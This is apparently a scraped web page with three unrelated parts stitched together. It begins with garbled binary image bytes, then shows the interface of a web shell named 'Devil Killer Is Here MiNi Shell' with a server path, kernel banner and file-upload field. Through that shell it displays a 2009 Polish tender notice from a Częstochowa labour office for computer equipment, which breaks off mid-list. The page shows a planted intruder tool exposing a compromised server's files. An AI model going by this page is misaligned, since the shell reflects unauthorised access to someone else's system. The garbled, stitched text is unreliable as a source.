JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20091001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20091001/167525-N-2009.html

<p class="kh_header"><b>Częstochowa: Przetarg nieograniczony o wartości poniżej 206 000 euro na zakup i dostawę sprzętu komputerowego, akcesoriów komputerowych oraz urządzeń wspomagających dla Powiatowego Urzędu Pracy w Częstochowie.</b><br>
<b>Numer ogłoszenia: 167525 - 2009; data zamieszczenia: 01.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Częstochowie , ul. Szymanowskiego 15, 42-200 Częstochowa, woj. śląskie, tel. 034 3706100 w. 186, faks 034 3243130.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony o wartości poniżej 206 000 euro na zakup i dostawę sprzętu komputerowego, akcesoriów komputerowych oraz urządzeń wspomagających dla Powiatowego Urzędu Pracy w Częstochowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I przetargu
zakup i dostawa drukarek, sprzętu oraz akcesoriów komputerowych
1. Monitory LCD 3 szt.
2. Drukarki i urządzenie wielofunkcyjne
drukarka laserowa kolorowa 3 szt.
Urządzenie wielofunkcyjne laserowe 9 szt.
Urządzenie wielofunkcyjne laserowe kolorowe 1 szt.
drukarka laserowa kolorowa A3 1 szt.
3.  Notebooki 2 szt.
4. Replikatory portów do notebooków8 szt.
5. Zewnętrzne przenośne dyski twarde4 kpl
6. Switche 5szt.
7. Czytniki kart chipowych (Smart Cards)50 szt.
8. Pamięć przenośna Pendrive 4 szt.
9. Akcesoria komputerowe
1	Linki zabezpieczające do notebooków ze stali galwanizowanej z dwoma zamkami typu T-Bar, z których jeden przesuwa się wzdłuż linki. Zamki zgodne ze slotem Kensington Security Slot, długość linki minimum 2,2m	5 szt.
2	Linki zabezpieczające do notebooków ze stali galwanizowanej z zamkiem szyfrowym o ilości kombinacji min 10 000. Zamki zgodne ze slotem Kensington Security Slot, długość linki minimum 1,8m	5 szt.
3	Mysz A4Tech XL-750F lub równoważna mysz laserowa przewodowa posiadająca co najmniej parametry:
Typ złącza: USB;
Liczba przycisków: min. 7 z mikrostykami o wytrzymałości nie mniej niż 8mln kliknięć;
Pokrętło: min. 1;
Rozdzielczości pracy min. 2500 dpi z możliwością zmiany trybu pracy na niższy bez instalowania dodatkowego oprogramowania;
Dla prawo- i leworęcznych; 
Liczba ślizgaczy nie mniej niż 6.
System operacyjny: Windows 98/ME/2000/XP;
długość przewodu min. 180 cm; kolor czarny	25szt.
4	Podkładki pod myszy spód wykonany z materiału antypoślizgowego, wierzch w jednobarwnym kolorze wykonany z polipropylenu (PP), przystosowana do myszek optycznych i laserowych, Wymiary: nie większe niż 220 x 180 mm.	175 szt.
5	Kabel przejściówki ze złącza MOLEX do zasilania dysków SATA	30 szt.
6	Płyty DVD-R Verbatim w opakowaniu slim lub inne równoważne płyty DVD-R	10 szt.
7	Płyty DVD+R Verbatim w opakowaniu slim lub inne równoważne płyty DVD+R	20.szt.
8	Dyskietki (opakowania 10 szt.)	20 op.
9	Listwy antyprzepięciowe ilość gniazd min. 5 długość kabla 1,5m.	10 szt.
10	Listwy antyprzepięciowe ilość gniazd min. 5 długość kabla 3m.	5 szt.
11	Kabel do podłączenia np. drukarki lub skanera; Standard USB 1.0/1.1/2.0
Końcówki USB - typ A oraz USB - typ B; Długość 1,8 m; Przepustowość 480 Mbps; Certyfikowany z USB 2.0, kolor przezroczysty	10 szt.
12	Kabel do podłączenia np. drukarki lub skanera; Standard USB 1.0/1.1/2.0 
Końcówki USB - typ A oraz USB - typ B; Długość 5 m; Przepustowość 480 Mbps; Certyfikowany z USB 2.0, kolor przezroczysty	5 szt.
13	Przedłużacz USB do podłączenia np. pendrive na biurku; Standard USB 1.0/1.1/2.0 
Końcówki USB - typ A męskie oraz USB - typ A żeńskie; Długość 1,8 m; Przepustowość 480 Mbps; Certyfikowany z USB 2.0, kolor przezroczysty	20 szt.
14	Koncentrator USB z zasilaczem o parametrach:
Kształt okrągły - 6 gniazda USB wyjściowych rozmieszczone na obwodzie.
Łącznie wyposażony w 7 portów USB, w tym jeden port USB mini.
Obsługa maksymalnie 7 zewnętrznych urządzeń ze standardem USB 2.0. Wyposażony w diodę sygnalizującą podłączenie urządzenia.
HUB nie może wymagać żadnych sterowników.	10 szt.
15	Ściereczki czyszczące z mikrofibry do LCD i laptopów nie pozostawiające smug i zanieczyszczeń, nadające się do prania i ponownego użycia o wymiarach nie mniejszych niż 180 x 150 mm	400 szt.
16	Sprężone powietrze pojemność opakowania 400ml	200 szt.
17	Pianka do plastiku antystatyczna i bakteriobójcza pianka do czyszczenia obudowy komputera, drukarek, klawiatury; pojemność opakowania 400ml	200 szt.
18	Pianka do matryc LCD TFT antystatyczna, bakteriobójcza pianka z aktywnymi cząsteczkami środków powierzchniowo - czynnych usuwająca wszelkiego rodzaju zanieczyszczenia z wyświetlaczy ciekłokrystalicznych TFT w laptopach, palmtopach, monitorach LCD; pojemność opakowania 100ml	250 szt.
19	Komplet materiałów eksploatacyjnych do drukarek laserowych kolorowych  wymienionych w pkt 2.1 - oryginalny producenta drukarki lub zamiennik w pełni kompatybilny z ww. urządzeniem o wydajności dla toneru czarnego 3500 stron oraz o wydajności dla tonerów kolorowych 2800 stron - zgodnie z normą ISO/IEC 19798 (wymagane potwierdzenie kompatybilności oraz wydajności oświadczeniem dostawcy oraz wymagana kopia raportu z testu zawartego w ww. normach).	16 szt.
20	Komplet materiałów eksploatacyjnych do urządzeń wielofunkcyjnych laserowych monochromatycznych  wymienionych w pkt 2.2 - oryginalny producenta urządzenia lub zamiennik w pełni kompatybilny z ww. urządzeniem o wydajności dla toneru monochromatycznego 7000 stron - zgodnie z normą ISO/IEC 19752 (wymagane potwierdzenie kompatybilności oraz wydajności oświadczeniem dostawcy oraz wymagana kopia raportu z testu zawartego w ww. normie).	20 szt.
21	Komplet materiałów eksploatacyjnych do urządzenia wielofunkcyjnego laserowego kolorowego wymienionego w pkt 2.3 - oryginalny producenta drukarki lub zamiennik w pełni kompatybilny z ww. urządzeniem o wydajności dla toneru czarnego 3500 stron oraz o wydajności dla tonerów kolorowych 2800 stron - zgodnie z normą ISO/IEC 19798 (wymagane potwierdzenie kompatybilności oraz wydajności oświadczeniem dostawcy oraz wymagana kopia raportu z testu zawartego w ww. normach).	2 kpl.
22	Komplet tonerów do drukarki laserowej kolorowej A3 wymienionej w pkt 2.4 - oryginalny producenta drukarki lub zamiennik w pełni kompatybilny z ww. urządzeniem o wydajności dla tonera 8000 stron - zgodnie z normą ISO/IEC 19798 (wymagane potwierdzenie kompatybilności oraz wydajności oświadczeniem dostawcy oraz wymagana kopia raportu z testu zawartego w ww. normach).	2 kpl.

Część II przetargu

Zakup, dostawa, montaż i uruchomienie 5 sztuk wielofunkcyjnych monochromatycznych urządzeń drukujących A3 obejmuje:
a) dostarczenie elementów urządzenia wielofunkcyjnego, łącznie z rozładunkiem urządzeń i materiałów oraz transportem na miejsce instalacji.
-dostawa 4 szt. urządzeń do budynku Powiatowego Urzędu Pracy przy ul. Szymanowskiego 15 w Częstochowie
-dostawa 1 szt. urządzenia do budynku Gminnego Centrum Pracy przy ul. Rzecznej 29 w Koniecpolu
b) montażu urządzenia we wskazanym miejscu,
c) uruchomienie urządzenia,
- konfiguracji urządzeń wchodzących w skład systemu,
- wykonania testów działania urządzenia,
- przeszkolenia 2 osób wskazanych przez Zamawiającego z zakresu obsługi na każde zainstalowane urządzenie

Specyfikacja techniczna
Technologia druku laserowa, toner jednoskładnikowy
Szybkość kopiowania/drukowania 30 kopii/min. format A4, 20 kopii/min. format A3
Rozdzielczość kopiowania/drukowania 600x600dpi / 1200dpi
Zoom 25 - 400%
Rozmiar oryginału do A3
Rozmiar kopii A6R - A3
Pamięć 512MB + dysk HDD 40GB drukarki
Podawanie papieru standard: dwie uniwersalne kasety - po 500 ark., podajnik ręczny 200 ark.,
Dupleks automatyczny
Wydajność miesięczna 100 000 kopii A4
Drukarka sieciowa z portem komunikacyjnym Ethernet 10/100 Base-T (RJ-45)
Protokół sieciowy TCP/IP
Dodatkowe porty komunikacyjne USB 2.0, dwukierunkowy port równoległy (IEEE 1284)
Automatyczny dwustronny podajnik dokumentów
Oryginalny stolik / szafka metalowa w komplecie
Dwustronny kolorowy skaner sieciowy
Format wyjściowy skanowanych dokumentów: PDF, TIFF
Składowanie dokumentów skanowanych FTP, SMB, poczta elektroniczna
Zainstalowany finiszer dokumentów na co najmniej 3000 kartek A4 możliwość zszywania w 3 pozycjach
Mailbox posiadający co najmniej 7 tac o pojemności nie mniej niż 100 kartek A4 każda.
Zainstalowany separator zadań co najmniej 100 kartkowy
Wyświetlacz LCD Dotykowy
W zestawie do każdego urządzenia toner startowy + 2 szt. tonera zapasowego (o wydajności min. 34 000 stron przy 5% zaciemnieniu - dotyczy tonera zapasowego)
Fabrycznie zainstalowany bęben Min. 300 000 kopii A4
Pobór energii elektrycznej do 1100W
Oprogramowanie: sterowniki drukarki dla systemu MS Windows Server 2000/2003 PL, MS Windows XP Pro PL, MS Windows Vista Biznes PL wraz z nośnikiem
Oprogramowanie: skanera sieciowego wraz z nośnikiem
Gwarancja 36 miesięcy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.23.00.00-0, 30.21.31.00-6, 30.23.21.10-8, 30.23.72.00-1, 32.42.00.00-3, 30.19.21.13-6, 48.62.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga złożenia wadium.

2. Wadium ustala się w wysokości:
a)	3 000,00zł (słownie: trzy tysiące złotych) w przypadku części I zamówienia,
b)	5 000,00zł (słownie: pięć tysięcy złotych) w przypadku części II zamówienia.

1.	Wadium ma być wniesione przed upływem terminu składania ofert, w pieniądzu przelewem na rachunek Powiatowego Urzędu Pracy w Częstochowie:

nr rachunku 97 1050 1142 1000 0023 4120 5496

z dopiskiem:
 przetarg nieograniczony na sprzęt komputerowy - część     (należy wpisać numer części).

4. Zwrotu wadium dla Wykonawców, których oferty nie zostały wybrane, Zamawiający dokona niezwłocznie jeżeli:
      - upłynął termin związania ofertą,
	- zawarto umowę w sprawie zamówienia publicznego, 
- unieważniono postępowanie, a protesty zostały ostatecznie rozstrzygnięte lub upłynął        termin do ich wnoszenia.

5. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:
      - który wycofał ofertę przed upływem terminu do składania ofert,
	- który został wykluczony z postępowania,
      - którego oferta została odrzucona.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust 1 w/w ustawy lub pełnomocnictw, chyba że udowodni, ze wynika to z przyczyn nieleżących po jego stronie. 

6. Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku, gdy:
      - odmówi podpisania umowy na warunkach określonych w ofercie,
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.

  7. Zamawiający zwróci wadium wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.

   8. Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione    prawidłowo.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust 1 ustawy Prawo zamówień publicznych, tj.:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2)	 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
3)	 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 

Zamawiający dokona oceny spełniania warunków udziału w postępowaniu  na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu stanowiące załącznik nr 6            do SIWZ oraz dokumentów określonych w SIWZ.

Ocena spełniania warunków udziału w postępowaniu  zostanie dokonana według formuły spełnianie spełnia na podstawie dokumentów i oświadczeń załączonych przez wykonawcę do oferty.
Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.

Oferty podlegać będą weryfikacji przez Komisję Przetargową.  
	Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnia. 
	Niespełnienie któregokolwiek z powyższych warunków spowoduje wykluczenie Wykonawcy   z postępowania w trybie ustawy Prawo zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW  WYMAGANYCH OD  WYKONAWCÓW BIORĄCYCH  UDZIAŁ  W  POSTĘPOWANIU O  UDZIELENIE
ZAMÓWIENIA  PUBLICZNEGO

1.	Formularz oferty stanowiący załącznik nr 2 do SIWZ.

2.	Oferta cenowa stanowiąca  załącznik nr 3 do SIWZ.

3.	Informacja o parametrach technicznych stanowiąca załącznik nr 8 do SIWZ.

4.	Aktualny wypis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji  działalności gospodarczej o profilu odpowiadającym przedmiotowi zamówienia, zawierające informację o osobach upoważnionych do składania oświadczeń woli w imieniu wykonawcy, wystawiony nie wcześniej niż sześć miesięcy przed upływem terminu składania ofert.

5.	  Umowę spółki cywilnej, jeżeli działalność gospodarcza przedsiębiorców jest prowadzona w formie spółki cywilnej. 

6.	Oryginalne pełnomocnictwo potwierdzające uprawnienia osób podpisujących ofertę,                o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.

7.	  Aktualne zaświadczenie z Urzędu Skarbowego o braku zaległości podatkowych  lub,           że Wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymaniu w całości wykonania decyzji organu podatkowego(data  wystawienia zaświadczenia nie może być wcześniejsza niż trzy miesiące przed upływem terminu składania ofert).

8.	  Aktualne zaświadczenie  z ZUS-u o braku zaległości w opłatach składek na ubezpieczenie zdrowotne lub  społeczne albo że Wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymaniu w całości wykonania decyzji organu podatkowego(data  wystawienia zaświadczenia nie może być wcześniejsza niż trzy miesiące przed upływem terminu składania ofert).

9.	Wykaz części zamówienia przekazanych do realizacji przez                            podwykonawców zgodnie z załącznikiem nr 7 do SIWZ ( jeżeli dotyczy).

10.	Informację o nazwie banku i numerze konta wykonawcy.


11.	Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1, 
         i art. 24 ustawy  Prawo zamówień publicznych, stanowiące załącznik nr 6 do SIWZ.



12.	Na mocy art. 23 ust.2 ustawy Prawo zamówień publicznych Wykonawcy  wspólnie ubiegający się o udzielenie zamówienia ustanawiają  pełnomocnika do reprezentowania ich w postępowaniu o udzielenie  zamówienia albo reprezentowania w postępowaniu                i zawarcia umowy w sprawie zamówienia publicznego. 
Dokumenty określone w ust.4, ust.6, ust.7, ust.8, ust.10 każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa osobno. Pozostałe dokumenty będą traktowane jako wspólne

13.	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia          19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane 
      (Dz. U. Nr 87,poz. 605)

Wszystkie dokumenty sporządzone w języku obcym muszą być załączone do oferty wraz        z tłumaczeniami w języku polskim dokonanymi przez tłumaczy przysięgłych
Wszystkie ww. dokumenty  winny być przedstawione w formie oryginału lub kserokopii poświadczonej Za zgodność z oryginałem (każda ze stron) przez osobę -y                   upoważnioną -e do składania oświadczeń  woli  w  imieniu  Wykonawcy (opatrzone datą  i imienną pieczątką lub czytelnym podpisem)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://pup.czestochowa.bip-gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Częstochowie, ul. K. Szymanowskiego 15, 42-217 Częstochowa, pokój 207.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2009 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Częstochowie, ul. K. Szymanowskiego 15, 42-217 Częstochowa, pokój 114.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> część I postępowania.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I przetargu
zakup i dostawa drukarek, sprzętu oraz akcesoriów komputerowych
1. Monitory LCD 3 szt.
2. Drukarki i urządzenie wielofunkcyjne
drukarka laserowa kolorowa 3 szt.
Urządzenie wielofunkcyjne laserowe 9 szt.
Urządzenie wielofunkcyjne laserowe kolorowe 1 szt.
drukarka laserowa kolorowa A3 1 szt.
3.  Notebooki 2 szt.
4. Replikatory portów do notebooków8 szt.
5. Zewnętrzne przenośne dyski twarde4 kpl
6. Switche 5szt.
7. Czytniki kart chipowych (Smart Cards)50 szt.
8. Pamięć przenośna Pendrive 4 szt.
9. Akcesoria komputerowe
1	Linki zabezpieczające do notebooków ze stali galwanizowanej z dwoma zamkami typu T-Bar, z których jeden przesuwa się wzdłuż linki. Zamki zgodne ze slotem Kensington Security Slot, długość linki minimum 2,2m	5 szt.
2	Linki zabezpieczające do notebooków ze stali galwanizowanej z zamkiem szyfrowym o ilości kombinacji min 10 000. Zamki zgodne ze slotem Kensington Security Slot, długość linki minimum 1,8m	5 szt.
3	Mysz A4Tech XL-750F lub równoważna mysz laserowa przewodowa posiadająca co najmniej parametry:
Typ złącza: USB;
Liczba przycisków: min. 7 z mikrostykami o wytrzymałości nie mniej niż 8mln kliknięć;
Pokrętło: min. 1;
Rozdzielczości pracy min. 2500 dpi z możliwością zmiany trybu pracy na niższy bez instalowania dodatkowego oprogramowania;
Dla prawo- i leworęcznych; 
Liczba ślizgaczy nie mniej niż 6.
System operacyjny: Windows 98/ME/2000/XP;
długość przewodu min. 180 cm; kolor czarny	25szt.
4	Podkładki pod myszy spód wykonany z materiału antypoślizgowego, wierzch w jednobarwnym kolorze wykonany z polipropylenu (PP), przystosowana do myszek optycznych i laserowych, Wymiary: nie większe niż 220 x 180 mm.	175 szt.
5	Kabel przejściówki ze złącza MOLEX do zasilania dysków SATA	30 szt.
6	Płyty DVD-R Verbatim w opakowaniu slim lub inne równoważne płyty DVD-R	10 szt.
7	Płyty DVD+R Verbatim w opakowaniu slim lub inne równoważne płyty DVD+R	20.szt.
8	Dyskietki (opakowania 10 szt.)	20 op.
9	Listwy antyprzepięciowe ilość gniazd min. 5 długość kabla 1,5m.	10 szt.
10	Listwy antyprzepięciowe ilość gniazd min. 5 długość kabla 3m.	5 szt.
11	Kabel do podłączenia np. drukarki lub skanera; Standard USB 1.0/1.1/2.0
Końcówki USB - typ A oraz USB - typ B; Długość 1,8 m; Przepustowość 480 Mbps; Certyfikowany z USB 2.0, kolor przezroczysty	10 szt.
12	Kabel do podłączenia np. drukarki lub skanera; Standard USB 1.0/1.1/2.0 
Końcówki USB - typ A oraz USB - typ B; Długość 5 m; Przepustowość 480 Mbps; Certyfikowany z USB 2.0, kolor przezroczysty	5 szt.
13	Przedłużacz USB do podłączenia np. pendrive na biurku; Standard USB 1.0/1.1/2.0 
Końcówki USB - typ A męskie oraz USB - typ A żeńskie; Długość 1,8 m; Przepustowość 480 Mbps; Certyfikowany z USB 2.0, kolor przezroczysty	20 szt.
14	Koncentrator USB z zasilaczem o parametrach:
Kształt okrągły - 6 gniazda USB wyjściowych rozmieszczone na obwodzie.
Łącznie wyposażony w 7 portów USB, w tym jeden port USB mini.
Obsługa maksymalnie 7 zewnętrznych urządzeń ze standardem USB 2.0. Wyposażony w diodę sygnalizującą podłączenie urządzenia.
HUB nie może wymagać żadnych sterowników.	10 szt.
15	Ściereczki czyszczące z mikrofibry do LCD i laptopów nie pozostawiające smug i zanieczyszczeń, nadające się do prania i ponownego użycia o wymiarach nie mniejszych niż 180 x 150 mm	400 szt.
16	Sprężone powietrze pojemność opakowania 400ml	200 szt.
17	Pianka do plastiku antystatyczna i bakteriobójcza pianka do czyszczenia obudowy komputera, drukarek, klawiatury; pojemność opakowania 400ml	200 szt.
18	Pianka do matryc LCD TFT antystatyczna, bakteriobójcza pianka z aktywnymi cząsteczkami środków powierzchniowo - czynnych usuwająca wszelkiego rodzaju zanieczyszczenia z wyświetlaczy ciekłokrystalicznych TFT w laptopach, palmtopach, monitorach LCD; pojemność opakowania 100ml	250 szt.
19	Komplet materiałów eksploatacyjnych do drukarek laserowych kolorowych  wymienionych w pkt 2.1 - oryginalny producenta drukarki lub zamiennik w pełni kompatybilny z ww. urządzeniem o wydajności dla toneru czarnego 3500 stron oraz o wydajności dla tonerów kolorowych 2800 stron - zgodnie z normą ISO/IEC 19798 (wymagane potwierdzenie kompatybilności oraz wydajności oświadczeniem dostawcy oraz wymagana kopia raportu z testu zawartego w ww. normach).	16 szt.
